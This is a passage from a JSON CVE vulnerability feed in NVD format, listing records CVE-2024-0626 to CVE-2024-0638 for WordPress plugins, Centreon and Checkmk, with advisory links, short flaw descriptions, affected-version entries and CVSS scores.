"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-25T03:15Z", "lastModifiedDate" : "2025-05-29T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0626", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/woo-clover-gateway-by-zaytech/trunk/zaytech-woo-commerce-clover-integration.php?rev=2998654#L218", "name" : "https://plugins.trac.wordpress.org/browser/woo-clover-gateway-by-zaytech/trunk/zaytech-woo-commerce-clover-integration.php?rev=2998654#L218", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/woo-clover-gateway-by-zaytech/trunk/zaytech-woo-commerce-clover-integration.php?rev=2998654#L218", "name" : "https://plugins.trac.wordpress.org/browser/woo-clover-gateway-by-zaytech/trunk/zaytech-woo-commerce-clover-integration.php?rev=2998654#L218", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3055678%40woo-clover-gateway-by-zaytech%2Ftrunk&old=2998658%40woo-clover-gateway-by-zaytech%2Ftrunk&sfp_email=&sfph_mail=#file3", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3055678%40woo-clover-gateway-by-zaytech%2Ftrunk&old=2998658%40woo-clover-gateway-by-zaytech%2Ftrunk&sfp_email=&sfph_mail=#file3", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3055678%40woo-clover-gateway-by-zaytech%2Ftrunk&old=2998658%40woo-clover-gateway-by-zaytech%2Ftrunk&sfp_email=&sfph_mail=#file3", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3055678%40woo-clover-gateway-by-zaytech%2Ftrunk&old=2998658%40woo-clover-gateway-by-zaytech%2Ftrunk&sfp_email=&sfph_mail=#file3", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/57aacffa-0f49-4a33-ae40-d1c151363284?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/57aacffa-0f49-4a33-ae40-d1c151363284?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/57aacffa-0f49-4a33-ae40-d1c151363284?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/57aacffa-0f49-4a33-ae40-d1c151363284?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WooCommerce Clover Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the callback_handler function in all versions up to, and including, 1.3.1. This makes it possible for unauthenticated attackers to mark orders as paid." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-09T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0627", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/637f07c6-68cd-4ac6-83fd-65dbaab882fc?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/637f07c6-68cd-4ac6-83fd-65dbaab882fc?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/637f07c6-68cd-4ac6-83fd-65dbaab882fc?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/637f07c6-68cd-4ac6-83fd-65dbaab882fc?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Custom Field Template plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom field name column in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied custom fields. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpgogo:custom_field_template:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.6.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-06-11T03:15Z", "lastModifiedDate" : "2025-01-29T17:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0628", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3029525/wp-rss-aggregator", "name" : "https://plugins.trac.wordpress.org/changeset/3029525/wp-rss-aggregator", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3029525/wp-rss-aggregator", "name" : "https://plugins.trac.wordpress.org/changeset/3029525/wp-rss-aggregator", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2154383e-eabb-4964-8991-423dd68d5efb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2154383e-eabb-4964-8991-423dd68d5efb?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2154383e-eabb-4964-8991-423dd68d5efb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2154383e-eabb-4964-8991-423dd68d5efb?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP RSS Aggregator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.23.5 via the RSS feed source in admin settings. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "4.23.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 3.8, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.2, "impactScore" : 2.5 } }, "publishedDate" : "2024-02-07T07:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0629", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/woocommerce-2checkout-payment/", "name" : "https://wordpress.org/plugins/woocommerce-2checkout-payment/", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/woocommerce-2checkout-payment/", "name" : "https://wordpress.org/plugins/woocommerce-2checkout-payment/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bcc6a4a5-b133-4ee1-a345-a7c812624b03?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bcc6a4a5-b133-4ee1-a345-a7c812624b03?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bcc6a4a5-b133-4ee1-a345-a7c812624b03?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bcc6a4a5-b133-4ee1-a345-a7c812624b03?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The 2Checkout Payment Gateway for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the sniff_ins function in all versions up to, and including, 6.2. This makes it possible for unauthenticated attackers to make changes to orders and mark them as paid." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-02T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0630", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3026269/wp-rss-aggregator", "name" : "https://plugins.trac.wordpress.org/changeset/3026269/wp-rss-aggregator", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3026269/wp-rss-aggregator", "name" : "https://plugins.trac.wordpress.org/changeset/3026269/wp-rss-aggregator", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP RSS Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the RSS feed source in all versions up to, and including, 4.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "4.23.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0631", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/duitku-social-payment-gateway/trunk/woocommerce-gateway-duitku.php#L409", "name" : "https://plugins.trac.wordpress.org/browser/duitku-social-payment-gateway/trunk/woocommerce-gateway-duitku.php#L409", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/duitku-social-payment-gateway/trunk/woocommerce-gateway-duitku.php#L409", "name" : "https://plugins.trac.wordpress.org/browser/duitku-social-payment-gateway/trunk/woocommerce-gateway-duitku.php#L409", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Duitku Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the check_duitku_response function in all versions up to, and including, 2.11.4. This makes it possible for unauthenticated attackers to change the payment status of orders to failed." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:duitku:duitku_payment_gateway:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.11.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-02-07T19:32Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0632", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/auto-translate/", "name" : "https://wordpress.org/plugins/auto-translate/", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/auto-translate/", "name" : "https://wordpress.org/plugins/auto-translate/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4727154c-c48f-4958-9520-cc5204927ee4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4727154c-c48f-4958-9520-cc5204927ee4?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4727154c-c48f-4958-9520-cc5204927ee4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4727154c-c48f-4958-9520-cc5204927ee4?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Automatic Translator with Google Translate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom font setting in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-22T08:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0637", "ASSIGNER" : "zdi-disclosures@trendmicro.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.zerodayinitiative.com/advisories/ZDI-24-118/", "name" : "ZDI-24-118", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] }, { "url" : "https://www.zerodayinitiative.com/advisories/ZDI-24-118/", "name" : "ZDI-24-118", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Centreon updateDirectory SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Centreon. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the updateDirectory function. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-22294." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:*", "versionEndExcluding" : "22.04.19", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:*", "versionStartIncluding" : "22.10.2", "versionEndExcluding" : "22.10.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:*", "versionStartIncluding" : "23.04.0", "versionEndExcluding" : "23.04.13", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:*", "versionStartIncluding" : "23.10.0", "versionEndExcluding" : "23.10.5", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-04-01T22:15Z", "lastModifiedDate" : "2025-08-07T17:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0638", "ASSIGNER" : "security@checkmk.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://checkmk.com/werk/16232", "name" : "https://checkmk.com/werk/16232", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://checkmk.com/werk/16232", "name" : "https://checkmk.com/werk/16232", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Least privilege violation in the Checkmk agent plugins mk_oracle, mk_oracle.ps1, and mk_oracle_crs before Checkmk 2.3.0b4 (beta), 2.2.0p24, 2.1.0p41 and 2.0.0 (EOL) allows local users to escalate privileges." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b6:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b7:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b8:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:b9:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p6:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:i1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p7:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p8:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:-:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:-:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p10:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p11:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p12:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p13:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p14:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p15:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p16:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p9:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p17:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p18:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p19:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p20:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p21:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p22:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p23:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p24:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p25:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.1.0:p26:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.3.0:b2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.3.0:b3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p6:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p7:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p8:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:p9:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b6:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b7:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:checkmk:checkmk:2.2.0:b8:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : 